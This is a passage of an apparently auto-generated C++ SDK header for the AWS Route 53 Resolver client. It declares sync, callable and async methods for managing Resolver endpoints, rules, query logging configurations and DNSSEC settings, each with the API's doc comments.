If you want * to add more than one IP address, submit one * <code>AssociateResolverEndpointIpAddress</code> request for each IP address.</p> * <p>To remove an IP address from an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverEndpointIpAddress.html">DisassociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverEndpointIpAddress">AWS * API Reference</a></p> */ virtual Model::AssociateResolverEndpointIpAddressOutcome AssociateResolverEndpointIpAddress(const Model::AssociateResolverEndpointIpAddressRequest& request) const; /** * <p>Adds IP addresses to an inbound or an outbound Resolver endpoint. If you want * to add more than one IP address, submit one * <code>AssociateResolverEndpointIpAddress</code> request for each IP address.</p> * <p>To remove an IP address from an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverEndpointIpAddress.html">DisassociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::AssociateResolverEndpointIpAddressOutcomeCallable AssociateResolverEndpointIpAddressCallable(const Model::AssociateResolverEndpointIpAddressRequest& request) const; /** * <p>Adds IP addresses to an inbound or an outbound Resolver endpoint. 
If you want * to add more than one IP address, submit one * <code>AssociateResolverEndpointIpAddress</code> request for each IP address.</p> * <p>To remove an IP address from an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverEndpointIpAddress.html">DisassociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void AssociateResolverEndpointIpAddressAsync(const Model::AssociateResolverEndpointIpAddressRequest& request, const AssociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Associates an Amazon VPC with a specified query logging configuration. Route * 53 Resolver logs DNS queries that originate in all of the Amazon VPCs that are * associated with a specified query logging configuration. To associate more than * one VPC with a configuration, submit one * <code>AssociateResolverQueryLogConfig</code> request for each VPC.</p> * <p>The VPCs that you associate with a query logging configuration must be in the * same Region as the configuration.</p> <p>To remove a VPC from a query * logging configuration, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>. 
* </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::AssociateResolverQueryLogConfigOutcome AssociateResolverQueryLogConfig(const Model::AssociateResolverQueryLogConfigRequest& request) const; /** * <p>Associates an Amazon VPC with a specified query logging configuration. Route * 53 Resolver logs DNS queries that originate in all of the Amazon VPCs that are * associated with a specified query logging configuration. To associate more than * one VPC with a configuration, submit one * <code>AssociateResolverQueryLogConfig</code> request for each VPC.</p> * <p>The VPCs that you associate with a query logging configuration must be in the * same Region as the configuration.</p> <p>To remove a VPC from a query * logging configuration, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::AssociateResolverQueryLogConfigOutcomeCallable AssociateResolverQueryLogConfigCallable(const Model::AssociateResolverQueryLogConfigRequest& request) const; /** * <p>Associates an Amazon VPC with a specified query logging configuration. Route * 53 Resolver logs DNS queries that originate in all of the Amazon VPCs that are * associated with a specified query logging configuration. 
To associate more than * one VPC with a configuration, submit one * <code>AssociateResolverQueryLogConfig</code> request for each VPC.</p> * <p>The VPCs that you associate with a query logging configuration must be in the * same Region as the configuration.</p> <p>To remove a VPC from a query * logging configuration, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void AssociateResolverQueryLogConfigAsync(const Model::AssociateResolverQueryLogConfigRequest& request, const AssociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Associates a Resolver rule with a VPC. When you associate a rule with a VPC, * Resolver forwards all DNS queries for the domain name that is specified in the * rule and that originate in the VPC. The queries are forwarded to the IP * addresses for the DNS resolvers that are specified in the rule. For more * information about rules, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_CreateResolverRule.html">CreateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverRule">AWS * API Reference</a></p> */ virtual Model::AssociateResolverRuleOutcome AssociateResolverRule(const Model::AssociateResolverRuleRequest& request) const; /** * <p>Associates a Resolver rule with a VPC. 
When you associate a rule with a VPC, * Resolver forwards all DNS queries for the domain name that is specified in the * rule and that originate in the VPC. The queries are forwarded to the IP * addresses for the DNS resolvers that are specified in the rule. For more * information about rules, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_CreateResolverRule.html">CreateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::AssociateResolverRuleOutcomeCallable AssociateResolverRuleCallable(const Model::AssociateResolverRuleRequest& request) const; /** * <p>Associates a Resolver rule with a VPC. When you associate a rule with a VPC, * Resolver forwards all DNS queries for the domain name that is specified in the * rule and that originate in the VPC. The queries are forwarded to the IP * addresses for the DNS resolvers that are specified in the rule. For more * information about rules, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_CreateResolverRule.html">CreateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void AssociateResolverRuleAsync(const Model::AssociateResolverRuleRequest& request, const AssociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Creates a Resolver endpoint. 
There are two types of Resolver endpoints, * inbound and outbound:</p> <ul> <li> <p>An <i>inbound Resolver endpoint</i> * forwards DNS queries to the DNS service for a VPC from your network.</p> </li> * <li> <p>An <i>outbound Resolver endpoint</i> forwards DNS queries from the DNS * service for a VPC to your network.</p> </li> </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::CreateResolverEndpointOutcome CreateResolverEndpoint(const Model::CreateResolverEndpointRequest& request) const; /** * <p>Creates a Resolver endpoint. There are two types of Resolver endpoints, * inbound and outbound:</p> <ul> <li> <p>An <i>inbound Resolver endpoint</i> * forwards DNS queries to the DNS service for a VPC from your network.</p> </li> * <li> <p>An <i>outbound Resolver endpoint</i> forwards DNS queries from the DNS * service for a VPC to your network.</p> </li> </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::CreateResolverEndpointOutcomeCallable CreateResolverEndpointCallable(const Model::CreateResolverEndpointRequest& request) const; /** * <p>Creates a Resolver endpoint. 
There are two types of Resolver endpoints, * inbound and outbound:</p> <ul> <li> <p>An <i>inbound Resolver endpoint</i> * forwards DNS queries to the DNS service for a VPC from your network.</p> </li> * <li> <p>An <i>outbound Resolver endpoint</i> forwards DNS queries from the DNS * service for a VPC to your network.</p> </li> </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void CreateResolverEndpointAsync(const Model::CreateResolverEndpointRequest& request, const CreateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Creates a Resolver query logging configuration, which defines where you want * Resolver to save DNS query logs that originate in your VPCs. Resolver can log * queries only for VPCs that are in the same Region as the query logging * configuration.</p> <p>To specify which VPCs you want to log queries for, you use * <code>AssociateResolverQueryLogConfig</code>. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverQueryLogConfig.html">AssociateResolverQueryLogConfig</a>. * </p> <p>You can optionally use AWS Resource Access Manager (AWS RAM) to share a * query logging configuration with other AWS accounts. The other accounts can then * associate VPCs with the configuration. 
The query logs that Resolver creates for * a configuration include all DNS queries that originate in all VPCs that are * associated with the configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::CreateResolverQueryLogConfigOutcome CreateResolverQueryLogConfig(const Model::CreateResolverQueryLogConfigRequest& request) const; /** * <p>Creates a Resolver query logging configuration, which defines where you want * Resolver to save DNS query logs that originate in your VPCs. Resolver can log * queries only for VPCs that are in the same Region as the query logging * configuration.</p> <p>To specify which VPCs you want to log queries for, you use * <code>AssociateResolverQueryLogConfig</code>. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverQueryLogConfig.html">AssociateResolverQueryLogConfig</a>. * </p> <p>You can optionally use AWS Resource Access Manager (AWS RAM) to share a * query logging configuration with other AWS accounts. The other accounts can then * associate VPCs with the configuration. The query logs that Resolver creates for * a configuration include all DNS queries that originate in all VPCs that are * associated with the configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::CreateResolverQueryLogConfigOutcomeCallable CreateResolverQueryLogConfigCallable(const Model::CreateResolverQueryLogConfigRequest& request) const; /** * <p>Creates a Resolver query logging configuration, which defines where you want * Resolver to save DNS query logs that originate in your VPCs. 
Resolver can log * queries only for VPCs that are in the same Region as the query logging * configuration.</p> <p>To specify which VPCs you want to log queries for, you use * <code>AssociateResolverQueryLogConfig</code>. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverQueryLogConfig.html">AssociateResolverQueryLogConfig</a>. * </p> <p>You can optionally use AWS Resource Access Manager (AWS RAM) to share a * query logging configuration with other AWS accounts. The other accounts can then * associate VPCs with the configuration. The query logs that Resolver creates for * a configuration include all DNS queries that originate in all VPCs that are * associated with the configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. 
*/ virtual void CreateResolverQueryLogConfigAsync(const Model::CreateResolverQueryLogConfigRequest& request, const CreateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>For DNS queries that originate in your VPCs, specifies which Resolver * endpoint the queries pass through, one domain name that you want to forward to * your network, and the IP addresses of the DNS resolvers in your * network.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverRule">AWS * API Reference</a></p> */ virtual Model::CreateResolverRuleOutcome CreateResolverRule(const Model::CreateResolverRuleRequest& request) const; /** * <p>For DNS queries that originate in your VPCs, specifies which Resolver * endpoint the queries pass through, one domain name that you want to forward to * your network, and the IP addresses of the DNS resolvers in your * network.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::CreateResolverRuleOutcomeCallable CreateResolverRuleCallable(const Model::CreateResolverRuleRequest& request) const; /** * <p>For DNS queries that originate in your VPCs, specifies which Resolver * endpoint the queries pass through, one domain name that you want to forward to * your network, and the IP addresses of the DNS resolvers in your * network.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. 
*/ virtual void CreateResolverRuleAsync(const Model::CreateResolverRuleRequest& request, const CreateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Deletes a Resolver endpoint. The effect of deleting a Resolver endpoint * depends on whether it's an inbound or an outbound Resolver endpoint:</p> <ul> * <li> <p> <b>Inbound</b>: DNS queries from your network are no longer routed to * the DNS service for the specified VPC.</p> </li> <li> <p> <b>Outbound</b>: DNS * queries from a VPC are no longer routed to your network.</p> </li> * </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::DeleteResolverEndpointOutcome DeleteResolverEndpoint(const Model::DeleteResolverEndpointRequest& request) const; /** * <p>Deletes a Resolver endpoint. The effect of deleting a Resolver endpoint * depends on whether it's an inbound or an outbound Resolver endpoint:</p> <ul> * <li> <p> <b>Inbound</b>: DNS queries from your network are no longer routed to * the DNS service for the specified VPC.</p> </li> <li> <p> <b>Outbound</b>: DNS * queries from a VPC are no longer routed to your network.</p> </li> * </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DeleteResolverEndpointOutcomeCallable DeleteResolverEndpointCallable(const Model::DeleteResolverEndpointRequest& request) const; /** * <p>Deletes a Resolver endpoint. 
The effect of deleting a Resolver endpoint * depends on whether it's an inbound or an outbound Resolver endpoint:</p> <ul> * <li> <p> <b>Inbound</b>: DNS queries from your network are no longer routed to * the DNS service for the specified VPC.</p> </li> <li> <p> <b>Outbound</b>: DNS * queries from a VPC are no longer routed to your network.</p> </li> * </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DeleteResolverEndpointAsync(const Model::DeleteResolverEndpointRequest& request, const DeleteResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Deletes a query logging configuration. When you delete a configuration, * Resolver stops logging DNS queries for all of the Amazon VPCs that are * associated with the configuration. This also applies if the query logging * configuration is shared with other AWS accounts, and the other accounts have * associated VPCs with the shared configuration.</p> <p>Before you can delete a * query logging configuration, you must first disassociate all VPCs from the * configuration. See <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>.</p> * <p>If you used Resource Access Manager (RAM) to share a query logging * configuration with other accounts, you must stop sharing the configuration * before you can delete a configuration. The accounts that you shared the * configuration with can first disassociate VPCs that they associated with the * configuration, but that's not necessary. 
If you stop sharing the configuration, * those VPCs are automatically disassociated from the configuration.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::DeleteResolverQueryLogConfigOutcome DeleteResolverQueryLogConfig(const Model::DeleteResolverQueryLogConfigRequest& request) const; /** * <p>Deletes a query logging configuration. When you delete a configuration, * Resolver stops logging DNS queries for all of the Amazon VPCs that are * associated with the configuration. This also applies if the query logging * configuration is shared with other AWS accounts, and the other accounts have * associated VPCs with the shared configuration.</p> <p>Before you can delete a * query logging configuration, you must first disassociate all VPCs from the * configuration. See <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>.</p> * <p>If you used Resource Access Manager (RAM) to share a query logging * configuration with other accounts, you must stop sharing the configuration * before you can delete a configuration. The accounts that you shared the * configuration with can first disassociate VPCs that they associated with the * configuration, but that's not necessary. If you stop sharing the configuration, * those VPCs are automatically disassociated from the configuration.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. 
*/ virtual Model::DeleteResolverQueryLogConfigOutcomeCallable DeleteResolverQueryLogConfigCallable(const Model::DeleteResolverQueryLogConfigRequest& request) const; /** * <p>Deletes a query logging configuration. When you delete a configuration, * Resolver stops logging DNS queries for all of the Amazon VPCs that are * associated with the configuration. This also applies if the query logging * configuration is shared with other AWS accounts, and the other accounts have * associated VPCs with the shared configuration.</p> <p>Before you can delete a * query logging configuration, you must first disassociate all VPCs from the * configuration. See <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>.</p> * <p>If you used Resource Access Manager (RAM) to share a query logging * configuration with other accounts, you must stop sharing the configuration * before you can delete a configuration. The accounts that you shared the * configuration with can first disassociate VPCs that they associated with the * configuration, but that's not necessary. If you stop sharing the configuration, * those VPCs are automatically disassociated from the configuration.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DeleteResolverQueryLogConfigAsync(const Model::DeleteResolverQueryLogConfigRequest& request, const DeleteResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Deletes a Resolver rule. Before you can delete a Resolver rule, you must * disassociate it from all the VPCs that you associated the Resolver rule with. 
* For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverRule.html">DisassociateResolverRule</a>.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverRule">AWS * API Reference</a></p> */ virtual Model::DeleteResolverRuleOutcome DeleteResolverRule(const Model::DeleteResolverRuleRequest& request) const; /** * <p>Deletes a Resolver rule. Before you can delete a Resolver rule, you must * disassociate it from all the VPCs that you associated the Resolver rule with. * For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverRule.html">DisassociateResolverRule</a>.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DeleteResolverRuleOutcomeCallable DeleteResolverRuleCallable(const Model::DeleteResolverRuleRequest& request) const; /** * <p>Deletes a Resolver rule. Before you can delete a Resolver rule, you must * disassociate it from all the VPCs that you associated the Resolver rule with. * For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverRule.html">DisassociateResolverRule</a>.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. 
*/ virtual void DeleteResolverRuleAsync(const Model::DeleteResolverRuleRequest& request, const DeleteResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Removes IP addresses from an inbound or an outbound Resolver endpoint. If you * want to remove more than one IP address, submit one * <code>DisassociateResolverEndpointIpAddress</code> request for each IP * address.</p> <p>To add an IP address to an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverEndpointIpAddress.html">AssociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverEndpointIpAddress">AWS * API Reference</a></p> */ virtual Model::DisassociateResolverEndpointIpAddressOutcome DisassociateResolverEndpointIpAddress(const Model::DisassociateResolverEndpointIpAddressRequest& request) const; /** * <p>Removes IP addresses from an inbound or an outbound Resolver endpoint. If you * want to remove more than one IP address, submit one * <code>DisassociateResolverEndpointIpAddress</code> request for each IP * address.</p> <p>To add an IP address to an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverEndpointIpAddress.html">AssociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. 
*/
        virtual Model::DisassociateResolverEndpointIpAddressOutcomeCallable DisassociateResolverEndpointIpAddressCallable(const Model::DisassociateResolverEndpointIpAddressRequest& request) const;

        /**
         * Removes IP addresses from an inbound or an outbound Resolver endpoint; to
         * remove more than one IP address, submit one request per address. Queues the
         * request into a thread executor and triggers the associated callback when the
         * operation has finished.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverEndpointIpAddress
         */
        virtual void DisassociateResolverEndpointIpAddressAsync(const Model::DisassociateResolverEndpointIpAddressRequest& request, const DisassociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Disassociates a VPC from a query logging configuration. Before a query logging
         * configuration can be deleted, all VPCs must first be disassociated from it.
         * For configurations shared through Resource Access Manager (RAM), either the
         * accounts the configuration was shared with disassociate their VPCs, or the
         * sharing is stopped.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverQueryLogConfig
         */
        virtual Model::DisassociateResolverQueryLogConfigOutcome DisassociateResolverQueryLogConfig(const Model::DisassociateResolverQueryLogConfigRequest& request) const;

        /**
         * Same as DisassociateResolverQueryLogConfig(), but returns a future so the call
         * can be executed in parallel to other requests.
         */
        virtual Model::DisassociateResolverQueryLogConfigOutcomeCallable DisassociateResolverQueryLogConfigCallable(const Model::DisassociateResolverQueryLogConfigRequest& request) const;

        /**
         * Same as DisassociateResolverQueryLogConfig(), but queues the request into a
         * thread executor and triggers the associated callback when the operation has
         * finished.
         */
        virtual void DisassociateResolverQueryLogConfigAsync(const Model::DisassociateResolverQueryLogConfigRequest& request, const DisassociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Removes the association between a specified Resolver rule and a specified VPC.
         * After disassociation, Resolver stops forwarding DNS queries for the domain
         * name specified in the rule.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverRule
         */
        virtual Model::DisassociateResolverRuleOutcome DisassociateResolverRule(const Model::DisassociateResolverRuleRequest& request) const;

        /**
         * Same as DisassociateResolverRule(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::DisassociateResolverRuleOutcomeCallable DisassociateResolverRuleCallable(const Model::DisassociateResolverRuleRequest& request) const;

        /**
         * Same as DisassociateResolverRule(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void DisassociateResolverRuleAsync(const Model::DisassociateResolverRuleRequest& request, const DisassociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets DNSSEC validation information for a specified resource.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverDnssecConfig
         */
        virtual Model::GetResolverDnssecConfigOutcome GetResolverDnssecConfig(const Model::GetResolverDnssecConfigRequest& request) const;

        /**
         * Same as GetResolverDnssecConfig(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::GetResolverDnssecConfigOutcomeCallable GetResolverDnssecConfigCallable(const Model::GetResolverDnssecConfigRequest& request) const;

        /**
         * Same as GetResolverDnssecConfig(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void GetResolverDnssecConfigAsync(const Model::GetResolverDnssecConfigRequest& request, const GetResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets information about a specified Resolver endpoint, such as whether it is an
         * inbound or an outbound endpoint and its current status.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverEndpoint
         */
        virtual Model::GetResolverEndpointOutcome GetResolverEndpoint(const Model::GetResolverEndpointRequest& request) const;

        /**
         * Same as GetResolverEndpoint(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::GetResolverEndpointOutcomeCallable GetResolverEndpointCallable(const Model::GetResolverEndpointRequest& request) const;

        /**
         * Same as GetResolverEndpoint(), but queues the request into a thread executor
         * and triggers the associated callback when the operation has finished.
         */
        virtual void GetResolverEndpointAsync(const Model::GetResolverEndpointRequest& request, const GetResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets information about a specified Resolver query logging configuration, such
         * as the number of VPCs it logs queries for and the destination the logs are
         * sent to.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfig
         */
        virtual Model::GetResolverQueryLogConfigOutcome GetResolverQueryLogConfig(const Model::GetResolverQueryLogConfigRequest& request) const;

        /**
         * Same as GetResolverQueryLogConfig(), but returns a future so the call can be
         * executed in parallel to other requests.
         */
        virtual Model::GetResolverQueryLogConfigOutcomeCallable GetResolverQueryLogConfigCallable(const Model::GetResolverQueryLogConfigRequest& request) const;

        /**
         * Same as GetResolverQueryLogConfig(), but queues the request into a thread
         * executor and triggers the associated callback when the operation has finished.
         */
        virtual void GetResolverQueryLogConfigAsync(const Model::GetResolverQueryLogConfigRequest& request, const GetResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets information about a specified association between a Resolver query
         * logging configuration and an Amazon VPC; with such an association, Resolver
         * logs DNS queries that originate in that VPC.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigAssociation
         */
        virtual Model::GetResolverQueryLogConfigAssociationOutcome GetResolverQueryLogConfigAssociation(const Model::GetResolverQueryLogConfigAssociationRequest& request) const;

        /**
         * Same as GetResolverQueryLogConfigAssociation(), but returns a future so the
         * call can be executed in parallel to other requests.
         */
        virtual Model::GetResolverQueryLogConfigAssociationOutcomeCallable GetResolverQueryLogConfigAssociationCallable(const Model::GetResolverQueryLogConfigAssociationRequest& request) const;

        /**
         * Same as GetResolverQueryLogConfigAssociation(), but queues the request into a
         * thread executor and triggers the associated callback when the operation has
         * finished.
         */
        virtual void GetResolverQueryLogConfigAssociationAsync(const Model::GetResolverQueryLogConfigAssociationRequest& request, const GetResolverQueryLogConfigAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets information about a query logging policy, which specifies the Resolver
         * query logging operations and resources that another AWS account is allowed to
         * use.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigPolicy
         */
        virtual Model::GetResolverQueryLogConfigPolicyOutcome GetResolverQueryLogConfigPolicy(const Model::GetResolverQueryLogConfigPolicyRequest& request) const;

        /**
         * Same as GetResolverQueryLogConfigPolicy(), but returns a future so the call
         * can be executed in parallel to other requests.
         */
        virtual Model::GetResolverQueryLogConfigPolicyOutcomeCallable GetResolverQueryLogConfigPolicyCallable(const Model::GetResolverQueryLogConfigPolicyRequest& request) const;

        /**
         * Same as GetResolverQueryLogConfigPolicy(), but queues the request into a
         * thread executor and triggers the associated callback when the operation has
         * finished.
         */
        virtual void GetResolverQueryLogConfigPolicyAsync(const Model::GetResolverQueryLogConfigPolicyRequest& request, const GetResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const;

        /**
         * Gets information about a specified Resolver rule, such as the domain name the
         * rule forwards DNS queries for and the ID of the outbound Resolver endpoint the
         * rule is associated with.
         * See: http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRule
         */
